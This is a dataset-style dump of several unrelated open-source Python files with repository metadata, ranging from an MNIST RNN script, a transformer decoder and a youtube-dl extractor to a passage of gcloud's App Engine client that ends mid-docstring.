56baa2cdea930d040883beca412dc675f051ecbf | cf4a525ed3f78e50b830fe23642d0127c3e05531 | /bucket list/bl-tail.py | d9e9a26151fc448d47827852a6c77e326a341214 | [] | no_license | pomann/programming_1_ca116 | a41514a72dc35e6011852b94e5454c91048f3252 | 8a78a5b5d292003272aec004cab1ebe8b012e54c | refs/heads/master | 2021-05-04T00:45:51.189173 | 2018-02-05T19:39:09 | 2018-02-05T19:39:09 | 120,350,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import sys
n = int(sys.argv[1])
f = raw_input()
m = []
i = 0
while f != "end":
m.append(f)
i += 1
f = raw_input()
if n > i:
o = 0
else:
o = i - n
while o < i:
print m[o]
o += 1
| [
"noreply@github.com"
] | noreply@github.com |
4501b4fd57612ad8cd33bb4bb8c8a53dd3e26d8b | 97b0ddc00ccb6ba1bdf75a683e9abf64659e7229 | /src/greengrass/lambda/alert/greengrass_alert.py | 423a5acf36c8674cdf73603278a3ffb0feeb30ac | [] | no_license | brenogibson/octank-monitoring-kiosk | 75cd9a2d6535ae58e5afbb546be9c5b9bf37d702 | 54cc06f3da436ff3d05953ab6e0fd81ac9efef8b | refs/heads/master | 2022-11-17T13:08:46.256198 | 2020-07-15T18:42:02 | 2020-07-15T18:42:02 | 278,373,741 | 0 | 0 | null | 2020-07-09T14:08:28 | 2020-07-09T13:34:07 | null | UTF-8 | Python | false | false | 1,385 | py | #
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# greengrassHelloWorldCounter.py
# Demonstrates a simple publish to a topic using Greengrass core sdk
# This lambda function will retrieve underlying platform information and send a hello world message along with the
# platform information to the topic 'hello/world/counter' along with a counter to keep track of invocations.
#
# This Lambda function requires the AWS Greengrass SDK to run on Greengrass devices.
# This can be found on the AWS IoT Console.
import json
import logging
import platform
import sys
import time
import greengrasssdk
# Setup logging to stdout
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# Creating a greengrass core sdk client
client = greengrasssdk.client("iot-data")
# Retrieving platform information to send from Greengrass Core
my_platform = platform.platform()
def function_handler(event, context):
if event['temperature'] > 37 :
try:
client.publish(
topic="kiosk/alert",
queueFullPolicy="AllOrException",
payload=json.dumps(
{"alert": {"temperature" : event['temperature']}}
),
)
except Exception as e:
logger.error("Failed to publish message: " + repr(e))
return
| [
"brenogibson94@gmail.com"
] | brenogibson94@gmail.com |
660782ca798d9ea8a567e5e704ec1f94490e19fd | 92636e4af15b08dcf1e64d31678cdefe125a99b9 | /setup.py | 35b73df5e4597e7108ee50a4e77e036eefe56f70 | [] | no_license | karpov-sv/fram | 7e09a89cbc0c6ac428d1c522e20b22932a71ad66 | f4d2ced8194905030d779c11c5f8b411dd2a9966 | refs/heads/master | 2023-06-22T14:13:45.627062 | 2023-06-15T12:15:13 | 2023-06-15T12:15:13 | 142,578,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from setuptools import setup, find_packages
requirements = [
'numpy',
'scipy',
'astropy',
'matplotlib',
'sep',
'statsmodels',
'esutil',
'psycopg2-binary',
'ephem',
'supersmoother',
# For web interface
'scikit-build', # needed for line-profiler below?..
'django',
# 'django-debug-toolbar',
# 'django-debug-toolbar-line-profiler',
'django-el-pagination',
'markdown',
]
setup(
name='fram',
version='0.1',
description='FRAM telescope related codes',
author='Sergey Karpov',
author_email='karpov.sv@gmail.com',
url='',
install_requires=requirements,
packages=['fram'],
package_dir={'':'src'}, # src/fram, symlink to fram, to behave nicely with development install
)
| [
"karpov.sv@gmail.com"
] | karpov.sv@gmail.com |
08541c40fee9474b87a66113054f486ea71f0e98 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-network/azure/mgmt/network/models/network_interface.py | fa19b8e2ad03dfa74bef269fdcb7d724b08d0661 | [
"MIT"
] | permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 4,531 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkInterface(Resource):
"""A NetworkInterface in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource Id
:type id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param virtual_machine: Gets or sets the reference of a VirtualMachine
:type virtual_machine: :class:`SubResource
<azure.mgmt.network.models.SubResource>`
:param network_security_group: Gets or sets the reference of the
NetworkSecurityGroup resource
:type network_security_group: :class:`NetworkSecurityGroup
<azure.mgmt.network.models.NetworkSecurityGroup>`
:param ip_configurations: Gets or sets list of IPConfigurations of the
network interface
:type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
<azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
:param dns_settings: Gets or sets DNS settings in network interface
:type dns_settings: :class:`NetworkInterfaceDnsSettings
<azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
:param mac_address: Gets the MAC address of the network interface
:type mac_address: str
:param primary: Gets whether this is a primary NIC on a virtual machine
:type primary: bool
:param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
on the NIC
:type enable_ip_forwarding: bool
:param resource_guid: Gets or sets resource guid property of the network
interface resource
:type resource_guid: str
:param provisioning_state: Gets provisioning state of the PublicIP
resource Updating/Deleting/Failed
:type provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
'primary': {'key': 'properties.primary', 'type': 'bool'},
'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
self.virtual_machine = virtual_machine
self.network_security_group = network_security_group
self.ip_configurations = ip_configurations
self.dns_settings = dns_settings
self.mac_address = mac_address
self.primary = primary
self.enable_ip_forwarding = enable_ip_forwarding
self.resource_guid = resource_guid
self.provisioning_state = provisioning_state
self.etag = etag
| [
"lmazuel@microsoft.com"
] | lmazuel@microsoft.com |
cbc244e711bf6a4c305a2d03973ffb5ac09658b0 | 85a6fcace7eaff15242595bdf9b9e8f41116dc7f | /Round A/workout.py | 7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1 | [
"MIT"
] | permissive | Meenadshi/GoogleKickStart-2020 | e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b | 7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df | refs/heads/main | 2023-08-15T23:41:31.484139 | 2021-10-17T00:34:58 | 2021-10-17T00:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
count = 0
for i in xrange(1, len(M)):
count += ((M[i]-M[i-1])-1)//target # ceiling(diff/target)-1
if count > K:
return False
return True
def workout():
N, K = map(int, raw_input().strip().split())
M = map(int, raw_input().strip().split())
left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
while left <= right:
mid = left + (right-left)//2
if check(M, K, mid):
right = mid-1
else:
left = mid+1
return left
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, workout())
| [
"kamyu104@gmail.com"
] | kamyu104@gmail.com |
a9194341e115335348649466389655b10bc7ccd4 | caa05194b8f11f29a19767c94fdc93628be694d5 | /nemo/collections/nlp/modules/common/transformer/transformer_decoders.py | 910a7104ea24d2870a596d91e46359933d887e99 | [
"Apache-2.0"
] | permissive | Jimmy-INL/NeMo | a589ab0ab97b9ccb8921579670e80c470ce7077b | 6a3753b3013dc92a3587853d60c5086e2e64d98f | refs/heads/main | 2023-04-02T22:28:29.891050 | 2021-04-13T18:22:24 | 2021-04-13T18:22:24 | 357,681,603 | 1 | 0 | Apache-2.0 | 2021-04-13T20:34:12 | 2021-04-13T20:34:12 | null | UTF-8 | Python | false | false | 8,169 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
"""
Building block of Transformer decoder.
Args:
hidden_size: size of the embeddings in the model, also known as d_model
inner_size: number of neurons in the intermediate part of feed-forward
net, usually is (4-8 x hidden_size) in the papers
num_attention_heads: number of heads in multi-head attention
attn_score_dropout: probability of dropout applied to attention scores
attn_layer_dropout: probability of dropout applied to the output of the
attention layers, but before layer normalization
ffn_dropout: probability of dropout applied to FFN output
hidden_act: activation function used between two linear layers in FFN
"""
def __init__(
self,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
self.pre_ln = pre_ln
self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
self.first_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
self.second_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)
def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Pre-LayerNorm block
Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
"""
residual = decoder_query
decoder_query = self.layer_norm_1(decoder_query)
decoder_keys = self.layer_norm_1(decoder_keys)
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += residual
residual = self_attn_output
self_attn_output = self.layer_norm_2(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += residual
residual = enc_dec_attn_output
enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += residual
return output_states
def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Post-LayerNorm block
Order of operations: Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
"""
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += decoder_query
self_attn_output = self.layer_norm_1(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += self_attn_output
enc_dec_attn_output = self.layer_norm_2(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += enc_dec_attn_output
return self.layer_norm_3(output_states)
def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
if self.pre_ln:
return self.forward_preln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
else:
return self.forward_postln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
def __init__(
self,
num_layers: int,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
layer = TransformerDecoderBlock(
hidden_size,
inner_size,
num_attention_heads,
attn_score_dropout,
attn_layer_dropout,
ffn_dropout,
hidden_act,
pre_ln,
)
self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
self.diagonal = 0
def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
if decoder_mems_list is not None:
memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
else:
memory_states = decoder_states
return memory_states
def forward(
self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
):
"""
Args:
decoder_states: output of the embedding layer (B x L_dec x H)
decoder_mask: decoder inputs mask (B x L_dec)
encoder_states: output of the encoder (B x L_enc x H)
encoder_mask: encoder inputs mask (B x L_enc)
decoder_mems_list: list of the cached decoder hidden states
for fast autoregressive generation which will be used instead
of decoder_states as keys and values if not None
return_mems: bool, whether to return outputs of all decoder layers
or the last layer only
"""
decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
encoder_attn_mask = form_attention_mask(encoder_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
cached_mems_list = [memory_states]
for i, layer in enumerate(self.layers):
decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
cached_mems_list.append(memory_states)
if return_mems:
return cached_mems_list
else:
return cached_mems_list[-1]
def eval(self):
self.diagonal = None
super().eval()
def train(self, mode=True):
if mode is True:
self.diagonal = 0
else:
self.diagonal = None
super().train(mode)
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
sample = next(self.parameters())
input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
| [
"noreply@github.com"
] | noreply@github.com |
ab81b868a0040eb8cd4674fd20d3f934f5141499 | 981ecc9cf59dd6f839c3e40d26601efb1d073558 | /src/face_recognition/youtube_dl/extractor/tf1.py | e595c4a69b3f03361abc05f6bca61adecb61cf36 | [
"MIT"
] | permissive | lodemo/CATANA | 469e0684b816f09ac74f186552b463cc77db369e | a349f460772511ccbb16429b40bfb50f774d45d4 | refs/heads/master | 2023-03-30T04:07:12.070332 | 2021-02-03T21:47:32 | 2021-02-03T21:47:32 | 102,767,095 | 12 | 6 | MIT | 2023-03-24T21:55:24 | 2017-09-07T17:36:45 | Jupyter Notebook | UTF-8 | Python | false | false | 2,239 | py | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
| [
"moritzlode@gmail.com"
] | moritzlode@gmail.com |
90652981b11712f044ed74cc7b84d1c10dba3246 | 57000e1000311e6428a2eb45732baf265a7d9eb7 | /helpers.py | a4b347fe740919052cb0ad10e0e8cb2a5fee69b5 | [
"WTFPL"
] | permissive | Khomille/osm-vs-fantoir | d83cf857db37ef21d2c24c28c5205e1876f5f94c | becd2ea3db24994e3a219db9127ba70306509dc0 | refs/heads/master | 2023-08-19T15:34:58.475507 | 2023-06-10T13:29:06 | 2023-06-10T13:29:06 | 329,862,681 | 0 | 0 | null | 2021-01-17T20:01:10 | 2021-01-15T09:11:50 | null | UTF-8 | Python | false | false | 215 | py |
def get_code_dept_from_insee(code_insee):
code_dept = code_insee[0:2]
if code_dept == '97':
code_dept = code_insee[0:3]
return code_dept
def escape_quotes(s):
return s.replace('\'','\'\'')
| [
"vdct@laposte.net"
] | vdct@laposte.net |
9f153ffb8255b57b288bac74a5076b641f9ce839 | 355eb0696346912d5b78cad8c2e4d1771ecfc042 | /RNN_MINST/RNN.py | 8abfc9b99ad7a95454df6a6fed2c2a75dc7ace8f | [] | no_license | Btr-bbit/RNN_MINIST | d4e05eb5d1d5be719a61c37b9c18bb79d6e57c49 | 4da143e24ff6ea7fa96ea2236f2fe808b5c8c811 | refs/heads/master | 2020-04-05T17:56:52.600976 | 2018-11-11T13:36:03 | 2018-11-11T13:36:03 | 157,082,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | #!/usr/bin/env python
# coding: utf-8
# In[7]:
#coding:utf-8
#识别MINIST数据集,教程多啊(泪流满面)
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib import rnn
mnist=input_data.read_data_sets("./data",one_hot=True)
train_rate=0.001
train_step=10000
batch_size=1280
display_step=100
frame_size=28
sequence_length=28
hidden_num=100
n_classes=10
#定义输入,输出
x=tf.placeholder(dtype=tf.float32,shape=[None,sequence_length*frame_size],name="inputx")
y=tf.placeholder(dtype=tf.float32,shape=[None,n_classes],name="expected_y")
#定义权值
weights=tf.Variable(tf.truncated_normal(shape=[hidden_num,n_classes]))
bias=tf.Variable(tf.zeros(shape=[n_classes]))
def RNN(x,weights,bias):
x=tf.reshape(x,shape=[-1,sequence_length,frame_size])
rnn_cell=tf.nn.rnn_cell.BasicRNNCell(hidden_num)
init_state=tf.zeros(shape=[batch_size,rnn_cell.state_size])
output,states=tf.nn.dynamic_rnn(rnn_cell,x,dtype=tf.float32)
return tf.nn.softmax(tf.matmul(output[:,-1,:],weights)+bias,1)
predy=RNN(x,weights,bias)
cost=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=predy,labels=y))
train=tf.train.AdamOptimizer(train_rate).minimize(cost)
correct_pred=tf.equal(tf.argmax(predy,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.to_float(correct_pred))
sess=tf.Session()
sess.run(tf.initialize_all_variables())
step=1
testx,testy=mnist.test.next_batch(batch_size)
while step<train_step:
batch_x,batch_y=mnist.train.next_batch(batch_size)
# batch_x=tf.reshape(batch_x,shape=[batch_size,sequence_length,frame_size])
_loss,__=sess.run([cost,train],feed_dict={x:batch_x,y:batch_y})
if step % display_step ==0:
acc,loss=sess.run([accuracy,cost],feed_dict={x:testx,y:testy})
print(step,acc,loss)
step+=1
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
8ae696da4dbd2dc4ad37c45c7cee3aab8b8b3f79 | 2b95f85a141804344a4d7e6414f76d6d8b28dc4d | /src/model/module/encoder/lstm_encoder.py | 9def6f69d84fba8bad53dd03e54e308bd70637f3 | [] | no_license | liangzongchang/pointer-net-for-nested | 3c8b6a854f705c5d270b5059ffc4cba1cee6496a | 4b9c6c82885e3255d0bee1f69acaace52c28d9fe | refs/heads/main | 2023-09-01T07:15:27.677571 | 2021-10-16T14:47:57 | 2021-10-16T14:47:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | import torch.nn as nn
from supar.modules import LSTM
from supar.modules.dropout import IndependentDropout, SharedDropout
import torch
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
class LSTMencoder(nn.Module):
def __init__(self, conf, input_dim, **kwargs):
super(LSTMencoder, self).__init__()
self.conf = conf
self.before_lstm_dropout = None
if self.conf.embed_dropout_type == 'independent':
self.embed_dropout = IndependentDropout(p=conf.embed_dropout)
if conf.before_lstm_dropout:
self.before_lstm_dropout = SharedDropout(p=conf.before_lstm_dropout)
elif self.conf.embed_dropout_type == 'shared':
self.embed_dropout = SharedDropout(p=conf.embed_dropout)
elif self.conf.embed_dropout_type == 'simple':
self.embed_dropout = nn.Dropout(p=conf.embed_dropout)
else:
self.embed_dropout = nn.Dropout(0.)
self.lstm = LSTM(input_size=input_dim,
hidden_size=conf.n_lstm_hidden,
num_layers=conf.n_lstm_layers,
bidirectional=True,
dropout=conf.lstm_dropout)
self.lstm_dropout = SharedDropout(p=conf.lstm_dropout)
def forward(self, info):
# lstm encoder
embed = info['embed']
seq_len = info['seq_len']
embed = [i for i in embed.values()]
if self.conf.embed_dropout_type == 'independent':
embed = self.embed_dropout(embed)
embed = torch.cat(embed, dim=-1)
else:
embed = torch.cat(embed, dim=-1)
embed = self.embed_dropout(embed)
seq_len = seq_len.cpu()
x = pack_padded_sequence(embed, seq_len.cpu() + (embed.shape[1] - seq_len.max()), True, False)
x, _ = self.lstm(x)
x, _ = pad_packed_sequence(x, True, total_length=embed.shape[1])
x = self.lstm_dropout(x)
info['encoded_emb'] = x
def get_output_dim(self):
return self.conf.n_lstm_hidden * 2
| [
"yangsl@shanghaitech.edu.cn"
] | yangsl@shanghaitech.edu.cn |
b613607484ff4991e3b7a52462661a1989ffd82b | 9b41bd4d829b7b4b5fc7ea2f375089793f34beb0 | /lib/googlecloudsdk/api_lib/app/appengine_client.py | baa0ff95581004e5a3dbd6f42446a6baadea863d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | eyalev/gcloud | 20a596f9cbf7873eaea652a0b2ad080678f1598c | 421ee63a0a6d90a097e8530d53a6df5b905a0205 | refs/heads/master | 2020-12-25T14:48:11.142544 | 2016-06-22T08:43:20 | 2016-06-22T08:43:20 | 61,703,392 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,561 | py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module used by gcloud to communicate with appengine services."""
from __future__ import with_statement
import urllib2
from googlecloudsdk.api_lib.app import logs_requestor
from googlecloudsdk.api_lib.app import util
from googlecloudsdk.api_lib.app import yaml_parsing
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.credentials import devshell as c_devshell
from googlecloudsdk.core.credentials import http
from googlecloudsdk.core.credentials import service_account as c_service_account
from googlecloudsdk.core.credentials import store as c_store
from googlecloudsdk.third_party.appengine.datastore import datastore_index
from googlecloudsdk.third_party.appengine.tools import appengine_rpc_httplib2
from oauth2client.contrib import gce as oauth2client_gce
import yaml
APPCFG_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
# Parameters for reading from the GCE metadata service.
METADATA_BASE = 'http://metadata.google.internal'
SERVICE_ACCOUNT_BASE = ('computeMetadata/v1/instance/service-accounts/default')
RpcServerClass = appengine_rpc_httplib2.HttpRpcServerOAuth2 # pylint: disable=invalid-name
class Error(exceptions.Error):
"""Base exception for the module."""
pass
class UnknownConfigType(Error):
"""An exception for when trying to update a config type we don't know."""
pass
class AppengineClient(object):
"""Client used by gcloud to communicate with appengine services.
Attributes:
server: The appengine server to which requests are sent.
project: The appengine application in use.
oauth2_access_token: An existing OAuth2 access token to use.
oauth2_refresh_token: An existing OAuth2 refresh token to use.
authenticate_service_account: Authenticate using the default service account
for the Google Compute Engine VM in which gcloud is being called.
ignore_bad_certs: Whether to ignore certificate errors when talking to the
server.
"""
def __init__(self, server=None, ignore_bad_certs=False):
self.server = server or 'appengine.google.com'
self.project = properties.VALUES.core.project.Get(required=True)
self.ignore_bad_certs = ignore_bad_certs
# Auth related options
self.oauth2_access_token = None
self.oauth2_refresh_token = None
self.oauth_scopes = APPCFG_SCOPES
self.authenticate_service_account = False
self.client_id = None
self.client_secret = None
account = properties.VALUES.core.account.Get()
# This statement will raise a c_store.Error if there is a problem
# fetching credentials.
credentials = c_store.Load(account=account)
if isinstance(credentials, c_service_account.ServiceAccountCredentials):
self.oauth2_access_token = credentials.access_token
self.client_id = credentials.client_id
self.client_secret = credentials.client_secret
elif isinstance(credentials, c_devshell.DevshellCredentials):
# TODO(user): This passes the access token to use for API calls to
# appcfg which means that commands that are longer than the lifetime
# of the access token may fail - e.g. some long deployments. The proper
# solution is to integrate appcfg closer with the Cloud SDK libraries,
# this code will go away then and the standard credentials flow will be
# used.
self.oauth2_access_token = credentials.access_token
self.client_id = None
self.client_secret = None
elif isinstance(credentials, oauth2client_gce.AppAssertionCredentials):
# If we are on GCE, use the service account
self.authenticate_service_account = True
self.client_id = None
self.client_secret = None
else:
# Otherwise use a stored refresh token
self.oauth2_refresh_token = credentials.refresh_token
self.client_id = credentials.client_id
self.client_secret = credentials.client_secret
def CleanupIndexes(self, index_yaml):
"""Removes unused datastore indexes.
Args:
index_yaml: The parsed yaml file with index data.
"""
rpcserver = self._GetRpcServer()
response = rpcserver.Send('/api/datastore/index/diff',
app_id=self.project, payload=index_yaml.ToYAML())
unused_new_indexes, notused_indexes = (
datastore_index.ParseMultipleIndexDefinitions(response))
# Get confirmation from user which indexes should be deleted.
deletions = datastore_index.IndexDefinitions(indexes=[])
if notused_indexes.indexes:
for index in notused_indexes.indexes:
msg = ('This index is no longer defined in your index.yaml file.\n{0}'
.format(str(index.ToYAML())))
prompt = 'Do you want to delete this index'
if console_io.PromptContinue(msg, prompt, default=True):
deletions.indexes.append(index)
# Do deletions of confirmed indexes.
if deletions.indexes:
response = rpcserver.Send('/api/datastore/index/delete',
app_id=self.project, payload=deletions.ToYAML())
not_deleted = datastore_index.ParseIndexDefinitions(response)
# Notify the user when indexes are not deleted.
if not_deleted.indexes:
not_deleted_count = len(not_deleted.indexes)
if not_deleted_count == 1:
warning_message = ('An index was not deleted. Most likely this is '
'because it no longer exists.\n\n')
else:
warning_message = ('%d indexes were not deleted. Most likely this '
'is because they no longer exist.\n\n'
% not_deleted_count)
for index in not_deleted.indexes:
warning_message += index.ToYAML()
log.warning(warning_message)
def GetLogs(self, service, version, severity, vhost, include_vhost,
include_all, num_days, end_date, output_file):
"""Get application logs for the given version of the service.
Args:
service: str, The service of the app to fetch logs from.
version: str, The version of the app to fetch logs for.
severity: int, App log severity to request (0-4); None for request logs
only.
vhost: str, The virtual host of log messages to get. None for all hosts.
include_vhost: bool, If true, the virtual host is included in log
messages.
include_all: bool, If true, we add to the log message everything we know
about the request.
num_days: int, Number of days worth of logs to export; 0 for all
available.
end_date: datetime.date, Date object representing last day of logs to
